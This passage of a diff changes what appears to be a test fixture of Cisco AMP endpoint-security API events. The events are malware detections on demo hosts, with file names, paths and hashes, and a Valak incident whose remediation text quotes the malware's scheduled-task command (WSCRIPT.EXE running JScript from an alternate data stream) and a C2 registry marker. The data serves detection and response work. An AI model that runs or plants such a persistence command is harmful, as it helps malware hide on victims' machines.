Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting 
Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
